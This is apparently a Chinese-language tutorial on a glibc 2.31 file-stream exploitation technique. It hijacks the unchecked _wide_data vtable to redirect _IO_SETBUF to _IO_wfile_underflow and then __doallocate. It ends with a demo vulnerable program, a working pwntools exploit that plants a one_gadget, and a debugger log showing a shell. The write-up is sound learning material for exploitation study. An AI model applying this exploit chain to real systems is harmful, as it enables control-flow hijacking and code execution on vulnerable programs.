Exploiting FSOP with _wide_data
前言
眾所周知,glibc在2.24引入vtable檢查,使針對vtable的攻擊手段如FSOP, House of Orange等攻擊手法失效,不過很快有一條新的利用鏈被發現,就是FILE成員中的
_wide_data段,在glibc執行_wide_data上vtable的函式時,並不會對該vtable進行檢查,因此衍生出如House of Apple等可以在高版本(>=2.35)通殺的利用手段.
本文主要探討在glibc 2.31環境下利用_wide_data進行vtable劫持,以達成控制流程劫持(control flow hijacking)
FILE結構分析
所有的原始碼皆取自 glibc source browser : Glibc 2.31 Source code
當在C語言進行如 FILE *fp=fopen(...) 或是使用stdin/stdout/stderr時,glibc都是使用以下結構:
struct _IO_FILE_plus{ FILE file; const struct _IO_jump_t *vtable;};其中FILE在內部的實作如下:
struct _IO_FILE_complete{ struct _IO_FILE _file;#endif __off64_t _offset; /* Wide character stream stuff. */ struct _IO_codecvt *_codecvt; struct _IO_wide_data *_wide_data; struct _IO_FILE *_freeres_list; void *_freeres_buf; size_t __pad5; int _mode; /* Make sure we don't get into trouble again. */ char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)]; // 你可以把它當作padding};其中可以看到除了描述FILE結構相關的_file之外,還有許多用來描述Wide character的相關member, 其中可以看到*_wide_data,追進去看一下相關定義:
struct _IO_wide_data{ wchar_t *_IO_read_ptr; /* Current read pointer */ wchar_t *_IO_read_end; /* End of get area. */ wchar_t *_IO_read_base; /* Start of putback+get area. */ wchar_t *_IO_write_base; /* Start of put area. */ wchar_t *_IO_write_ptr; /* Current put pointer. */ wchar_t *_IO_write_end; /* End of put area. */ wchar_t *_IO_buf_base; /* Start of reserve area. */ wchar_t *_IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */ wchar_t *_IO_backup_base; /* Pointer to first valid character of backup area */ wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */
__mbstate_t _IO_state; __mbstate_t _IO_last_state; struct _IO_codecvt _codecvt;
wchar_t _shortbuf[1];
const struct _IO_jump_t *_wide_vtable;};可以看到在裡面又有一個vtable, 跟前面的_IO_FILE_plus一樣是使用_IO_jump_t做宣告,接著來看vtable的成員是怎麼被呼叫的
標準IO呼叫流程
這邊以printf為例
printf
首先當呼叫printf時,glibc會把printf的參數再丟到__printf_chk裡面做進一步的處理,有點類似__libc_malloc與_int_malloc的概念:
__fortify_function intprintf (const char *__restrict __fmt, ...){ return __printf_chk (__USE_FORTIFY_LEVEL - 1, __fmt, __va_arg_pack ());}然後我們可以一直往裡面追進去(中間的過程太繁瑣就不列出),可以發現他是遵循以下流程:
- printf() - __printf_chk() - __vfprintf_internal()其中__vfprintf_internal其實是一個alias:
# define vfprintf __vfprintf_internal仔細看vfprintf的source code,可以看到
剛開始有對於Wide char的檢查,實際上就是去看FILE結構裡面_mode這個成員:
// vfprintf#ifdef ORIENT /* Check for correct orientation. */ if (_IO_vtable_offset (s) == 0 && _IO_fwide (s, sizeof (CHAR_T) == 1 ? -1 : 1) != (sizeof (CHAR_T) == 1 ? -1 : 1)) /* The stream is already oriented otherwise. */ return EOF;#endif
// _IO_fwide#define _IO_fwide(__fp, __mode) \ ({ int __result = (__mode); \ if (__result < 0 && ! _IO_fwide_maybe_incompatible) \ { \ if ((__fp)->_mode == 0) \ /* We know that all we have to do is to set the flag. */ \ (__fp)->_mode = -1; \ __result = (__fp)->_mode; \ } \ else if (__builtin_constant_p (__mode) && (__mode) == 0) \ __result = _IO_fwide_maybe_incompatible ? -1 : (__fp)->_mode; \ else \ __result = _IO_fwide (__fp, __result); \ __result; })接下來做一個對於buffer的檢查,然後就是一連串對於format string的處理,不過不在討論範疇,感興趣的是他如何去做高階IO,可以在接近結尾的地方看到:
done = printf_positional (s, format, readonly_format, ap, &ap_save, done, nspecs_done, lead_str_end, work_buffer, save_errno, grouping, thousands_sep, mode_flags);追進去printf_positional可以看到關於輸出的部分都是使用一個叫做outstring的macro:
/* Write the following constant string. */ outstring (specs[nspecs_done].end_of_fmt, specs[nspecs_done].next_fmt - specs[nspecs_done].end_of_fmt);然後可以來看outstring這個macro:
#define outstring(String, Len) \ do \ { \ assert ((size_t) done <= (size_t) INT_MAX); \ if ((size_t) PUT (s, (String), (Len)) != (size_t) (Len)) \ { \ done = -1; \ goto all_done; \ } \ if (__glibc_unlikely (INT_MAX - done < (Len))) \ { \ done = -1; \ __set_errno (EOVERFLOW); \ goto all_done; \ } \ done += (Len); \ } \ while (0)他實際上是用PUT去做輸出,查看定義可以看到是使用vtable裡面的函數:
# define PUT(F, S, N) _IO_sputn ((F), (S), (N))接著可以看對於_IO_sputn的相關定義,總之可以一直追到vtable的跳轉部分:
#define _IO_sputn(__fp, __s, __n) _IO_XSPUTN (__fp, __s, __n)#define _IO_XSPUTN(FP, DATA, N) JUMP2 (__xsputn, FP, DATA, N)#define JUMP2(FUNC, THIS, X1, X2) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
# define _IO_JUMPS_FUNC(THIS) \ (IO_validate_vtable \ (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \ + (THIS)->_vtable_offset)))最終在使用vtable上的函數之前,會有一個關於vtable的檢查,該檢查相當簡單,去檢查vtable是否位在glibc上的vtable segment:
IO_validate_vtable (const struct _IO_jump_t *vtable){ /* Fast path: The vtable pointer is within the __libc_IO_vtables section. */ uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables; uintptr_t ptr = (uintptr_t) vtable; uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables; if (__glibc_unlikely (offset >= section_length)) /* The vtable pointer is not in the expected section. Use the slow path, which will terminate the process if necessary. */ _IO_vtable_check (); return vtable;}若vtable不在該區段內,則會進入慢速路徑_IO_vtable_check,它只確認是否允許使用外部vtable(相容性旗標,或libc位於非預設namespace),都不符合就直接終止程式:
void attribute_hidden_IO_vtable_check (void){#ifdef SHARED /* Honor the compatibility flag. */ void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);#ifdef PTR_DEMANGLE PTR_DEMANGLE (flag);#endif if (flag == &_IO_vtable_check) return;
/* In case this libc copy is in a non-default namespace, we always need to accept foreign vtables because there is always a possibility that FILE * objects are passed across the linking boundary. */ { Dl_info di; struct link_map *l; if (!rtld_active () || (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0 && l->l_ns != LM_ID_BASE)) return; }
#else /* !SHARED */ /* We cannot perform vtable validation in the static dlopen case because FILE * handles might be passed back and forth across the boundary. Therefore, we disable checking in this case. */ if (__dlopen != NULL) return;#endif
__libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");}_IO_XSPUTN
前面講到printf最後是去呼叫到vtable裡面的_IO_XSPUTN成員,有以下定義:
size_t_IO_new_file_xsputn (FILE *f, const void *data, size_t n){ const char *s = (const char *) data; size_t to_do = n; int must_flush = 0; size_t count = 0;
if (n <= 0) return 0; /* This is an optimized implementation. If the amount to be written straddles a block boundary (or the filebuf is unbuffered), use sys_write directly. */
/* First figure out how much space is available in the buffer. */ if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING)) { count = f->_IO_buf_end - f->_IO_write_ptr; if (count >= n) { const char *p; for (p = s + n; p > s; ) { if (*--p == '\n') { count = p - s + 1; must_flush = 1; break; } } } } else if (f->_IO_write_end > f->_IO_write_ptr) count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */
/* Then fill the buffer. */ if (count > 0) { if (count > to_do) count = to_do; f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count); s += count; to_do -= count; } if (to_do + must_flush > 0) { size_t block_size, do_write; /* Next flush the (full) buffer. */ if (_IO_OVERFLOW (f, EOF) == EOF) /* If nothing else has to be written we must not signal the caller that everything has been written. */ return to_do == 0 ? EOF : n - to_do;
/* Try to maintain alignment: write a whole number of blocks. */ block_size = f->_IO_buf_end - f->_IO_buf_base; do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write) { count = new_do_write (f, s, do_write); to_do -= count; if (count < do_write) return n - to_do; }
/* Now write out the remainder. Normally, this will fit in the buffer, but it's somewhat messier for line-buffered files, so we let _IO_default_xsputn handle the general case. */ if (to_do) to_do -= _IO_default_xsputn (f, s+do_write, to_do); } return n - to_do;}可以看到他使用_IO_OVERFLOW macro去刷新buffer,這邊會需要通過vtable驗證:
#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
# define _IO_JUMPS_FUNC(THIS) \ (IO_validate_vtable \ (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \ + (THIS)->_vtable_offset)))不過在初步追蹤的時候_IO_OVERFLOW下方可以看到_IO_WOVERFLOW的定義:
#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
#define _IO_WIDE_JUMPS(THIS) \ _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable追蹤到呼叫vtable的地方,可以發現完全沒有任何檢查,直接去存取_wide_vtable
Bypass Vtable checks
從以上可以發現,FILE結構雖然有對vtable位置的驗證,但是在做寬字元處理時,不知道出於什麼原因,glibc不會對wide_data中的vtable做驗證
因此若可以構造_wide_data指向一個我們可控制的區域,那就有機會像glibc 2.23那樣利用一次寫Heap地址(例如largebin attack)去構造一個fake FILE達成FSOP
FSOP
Without vtable validation
在沒有進行vtable驗證的低版本,可以透過以下調用鏈進行利用:
- exit - _IO_cleanup - _IO_flush_all_lockp其中_IO_flush_all_lockp會對每個FILE結構檢查buffer裡面是否還有內容,若有則呼叫overflow,這時候如果把vtable改成一個可控地址,並在上面寫上One gadget就可以控制流程
不過glibc 2.23 (Ubuntu 16.04)真的非常古老,基本上都不會看到,但我們還是可以利用_wide_data去進行FSOP
With vtable validation
前面提到的調用鏈是讓_IO_flush_all_lockp裡面的overflow去觸發fake vtable裡面的one gadget,不過由於vtable validation的存在,走這條路似乎不太可行
不過_IO_cleanup裡面並不是只有這邊才會去呼叫vtable,稍微看一下可以發現呼叫完之後又去呼叫_IO_unbuffer_all:
static void_IO_unbuffer_all (void){ FILE *fp;
#ifdef _IO_MTSAFE_IO _IO_cleanup_region_start_noarg (flush_cleanup); _IO_lock_lock (list_all_lock);#endif
for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain) { int legacy = 0;
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1) if (__glibc_unlikely (_IO_vtable_offset (fp) != 0)) legacy = 1;#endif
if (! (fp->_flags & _IO_UNBUFFERED) /* Iff stream is un-orientated, it wasn't used. */ && (legacy || fp->_mode != 0)) {#ifdef _IO_MTSAFE_IO int cnt;#define MAXTRIES 2 for (cnt = 0; cnt < MAXTRIES; ++cnt) if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0) break; else /* Give the other thread time to finish up its use of the stream. */ __sched_yield ();#endif
if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF)) { fp->_flags |= _IO_USER_BUF;
fp->_freeres_list = freeres_list; freeres_list = fp; fp->_freeres_buf = fp->_IO_buf_base; }
_IO_SETBUF (fp, NULL, 0);
if (! legacy && fp->_mode > 0) _IO_wsetb (fp, NULL, NULL, 0);
#ifdef _IO_MTSAFE_IO if (cnt < MAXTRIES && fp->_lock != NULL) _IO_lock_unlock (*fp->_lock);#endif }
/* Make sure that never again the wide char functions can be used. */ if (! legacy) fp->_mode = -1; }
#ifdef _IO_MTSAFE_IO _IO_lock_unlock (list_all_lock); _IO_cleanup_region_end (0);#endif}仔細看他在_IO_list_all的迭代流程,會呼叫_IO_SETBUF,這是一個vtable裡面的member.
從前面的分析可以發現,glibc在對vtable做完驗證之後,呼叫的方式是以vtable地址加上一個固定的offset取出函式指標再呼叫,且vtable驗證只檢查該地址是否落在glibc的vtable segment範圍內.
在該區段上存放非常多vtable,若我們可以利用錯位的方式偽造vtable,就可讓原本要正常呼叫_IO_SETBUF去呼叫到其他member, 甚至去呼叫其他vtable裡面的member
可以先看一下正常的FILE結構,他的vtable是長這樣的:
pwndbg> p _IO_file_jumps$13 = { __dummy = 0, __dummy2 = 0, __finish = 0x7f4535b96f50 <_IO_new_file_finish>, __overflow = 0x7f4535b97d80 <_IO_new_file_overflow>, __underflow = 0x7f4535b97a20 <_IO_new_file_underflow>, __uflow = 0x7f4535b98f50 <__GI__IO_default_uflow>, __pbackfail = 0x7f4535b9a680 <__GI__IO_default_pbackfail>, __xsputn = 0x7f4535b965d0 <_IO_new_file_xsputn>, __xsgetn = 0x7f4535b96240 <__GI__IO_file_xsgetn>, __seekoff = 0x7f4535b95860 <_IO_new_file_seekoff>, __seekpos = 0x7f4535b99600 <_IO_default_seekpos>, __setbuf = 0x7f4535b95530 <_IO_new_file_setbuf>, __sync = 0x7f4535b953c0 <_IO_new_file_sync>, __doallocate = 0x7f4535b88c70 <__GI__IO_file_doallocate>, __read = 0x7f4535b965a0 <__GI__IO_file_read>, __write = 0x7f4535b95e60 <_IO_new_file_write>, __seek = 0x7f4535b95600 <__GI__IO_file_seek>, __close = 0x7f4535b95520 <__GI__IO_file_close>, __stat = 0x7f4535b95e40 <__GI__IO_file_stat>, __showmanyc = 0x7f4535b9a810 <_IO_default_showmanyc>, __imbue = 0x7f4535b9a820 <_IO_default_imbue>}既然知道可以透過偽造vtable去讓_IO_SETBUF呼叫到其他member,那肯定是要讓這個被呼叫的函數能夠做_wide_data的處理,因為我們能夠偽造_wide_data裡面的vtable,
不過問題是怎麼做呢? 其實有很多條調用鏈,因為所有跟wide char有關的處理函數都沒有套用vtable驗證,這邊挑一個比較簡單的_IO_wfile_underflow來講.
首先稍微trace一下_IO_wfile_underflow, 並找到第一個呼叫vtable的部分:
wint_t_IO_wfile_underflow (FILE *fp){ struct _IO_codecvt *cd; enum __codecvt_result status; ssize_t count; // ... if (fp->_wide_data->_IO_buf_base == NULL) { /* Maybe we already have a push back pointer. */ if (fp->_wide_data->_IO_save_base != NULL) { free (fp->_wide_data->_IO_save_base); fp->_flags &= ~_IO_IN_BACKUP; } _IO_wdoallocbuf (fp); } // ... return *fp->_wide_data->_IO_read_ptr;}可以看到,如果_wide_data裡面的_IO_buf_base為null, 他會去呼叫_IO_wdoallocbuf:
void_IO_wdoallocbuf (FILE *fp){ if (fp->_wide_data->_IO_buf_base) return; if (!(fp->_flags & _IO_UNBUFFERED)) if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF) return; _IO_wsetb (fp, fp->_wide_data->_shortbuf, fp->_wide_data->_shortbuf + 1, 0);}
#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP)可以看到他使用_IO_WDOALLOCATE這個macro去呼叫vtable裡面的__doallocate,也就是不會通過vtable檢查!
因此我們如果有辦法觸發這個_IO_WDOALLOCATE,就有辦法透過偽造出來的vtable去控制執行流程(control flow):
- _IO_wfile_underflow - _IO_wdoallocbuf - _IO_WDOALLOCATE - __doallocate
Triggering fake vtable
透過以上的分析,可以發現我們若要使用FSOP進行利用,需要滿足以下條件:
程式從main return / 觸發abort / 呼叫exit(注意: glibc 2.27之後abort不再刷新stdio streams,因此在本文的2.31環境下,實際上需要透過main return或exit來觸發)
除此之外,還有一些檢查必須繞過,才能讓glibc最終呼叫到我們偽造的vtable(上面的__doallocate)
首先是進入_IO_wfile_underflow前,我們需要通過以下調用鏈:
- exit - _IO_cleanup - _IO_unbuffer_all
_IO_cleanup在呼叫_IO_unbuffer_all之前,會先呼叫_IO_flush_all_lockp,其中有以下對於刷新buffer的檢查:
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) || (_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)) ) && _IO_OVERFLOW (fp, EOF) == EOF)我們不希望踩進去_IO_OVERFLOW造成不必要的麻煩,因此fp裡面的_mode設成1, fp->_wide_data->_IO_write_ptr與fp->_wide_data->_IO_write_base皆設成NULL
接下來就會進到_IO_unbuffer_all,透過以下流程就可以control flow:
- _IO_SETBUF (偽造成_IO_wfile_underflow) - _IO_wdoallocbuf - _IO_WDOALLOCATE - __doallocate接下來我們關心的是如何透過偽造vtable地址讓_IO_SETBUF變成_IO_wfile_underflow,那可以先看一下_IO_SETBUF的offset:
pwndbg> p &_IO_file_jumps.__setbuf$18 = (_IO_setbuf_t *) 0x7feb2d9544f8 <_IO_file_jumps+88>可以發現他在_IO_file_jumps+0x58處,再看一下_IO_wfile_underflow:
pwndbg> p &_IO_wfile_jumps.__underflow$20 = (_IO_underflow_t *) 0x7feb2d953f80 <_IO_wfile_jumps+32>發現他在_IO_wfile_jumps+0x20處,因此我們可以偽造vtable,讓他指向_IO_wfile_jumps-0x38,那當glibc呼叫_IO_SETBUF這個macro時,
就會去存取_IO_wfile_jumps-0x38+0x58, 也就是_IO_wfile_jumps+0x20,就成功讓glibc進入處理wide char的函數了
偽造完fp,接著來看如何去構造_wide_data,分析一下呼叫vtable之前會做什麼判斷:
if (fp->_wide_data->_IO_buf_base == NULL) { /* Maybe we already have a push back pointer. */ if (fp->_wide_data->_IO_save_base != NULL) { free (fp->_wide_data->_IO_save_base); fp->_flags &= ~_IO_IN_BACKUP; } _IO_wdoallocbuf (fp); }可以看到假如wide_data->_IO_buf_base為NULL就會踩進來,並且我們需要規避上面的free,但也非常簡單,只需要把_wide_data->_IO_save_base設成NULL,就可以繞過,並最終去觸發__doallocate
Exploit
綜合以上所述,我們可以構造FILE結構如下:
_mode: 1 (1代表正在使用wide char)
_wide_data: 指向偽造的_wide_data
vtable: _IO_wfile_jumps-0x38
並偽造以下_wide_data:
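_IO_write_base, _IO_write_ptr: NULL (避免在_IO_flush_all_lockp觸發_IO_OVERFLOW)
_IO_buf_base, _IO_save_base: NULL (進入_IO_wdoallocbuf並避開free)
_wide_vtable: 指向偽造的vtable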
接著在vtable的__doallocate上放上想執行的位置,就能control flow了,以下隨便寫一個小程式demo一下偽造的過程:
vuln.c :
#include <stdio.h>#include <stdlib.h>#include <unistd.h>
char buf[512];FILE *fp;
int main() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); fp = tmpfile(); printf("%p\n", stderr); printf("fs: "); read(0, (void*)fp, 225); printf("buf: "); read(0, buf, sizeof(buf)); exit(0);}關於__doallocate,可以在_IO_wfile_jumps+0x68找到他:
pwndbg> p &_IO_wfile_jumps.__doallocate
$21 = (_IO_doallocate_t *) 0x7feb2d953fc8 <_IO_wfile_jumps+104>
pwndbg>
exploit:
#!/usr/bin/env python3from pwn import *context.binary = "a.out"e = context.binaryl = ELF("/lib/x86_64-linux-gnu/libc.so.6")r = process(e.path)
stderr = int(r.recvline().strip(), 16)l.address = stderr-l.sym._IO_2_1_stderr_success("libc : %s" % hex(l.address))
p = flat( { 0xc0 : 1, 0xa0 : e.sym.buf, # _wide_data 0xd8 : l.sym._IO_wfile_jumps-0x38 # vtable }, filler = b"\0")r.sendlineafter(":", p)
p = flat( { 0xe0 : e.sym.buf+256, # fake_vtable 0x168 : l.address+0xe3b04 # fake_vtable+0x68 }, filler = b"\0")pause()r.sendlineafter(":", p)
r.interactive()我們把fake_vtable+0x68處放上one_gadget,也就是讓doallocate開個shell出來:
pwndbg> atAttaching to a.out ...
Program stopped.0x00007f5f9b990fd2 in __GI___libc_read (fd=0, buf=0x4040c0 <buf>, nbytes=512) at ../sysdeps/unix/sysv/linux/read.c:2626 ../sysdeps/unix/sysv/linux/read.c: No such file or directory.pwndbg> cContinuing.process 276 is executing new program: /usr/bin/dash成功get shell
Refs
其中Roderick為House of Apple發明者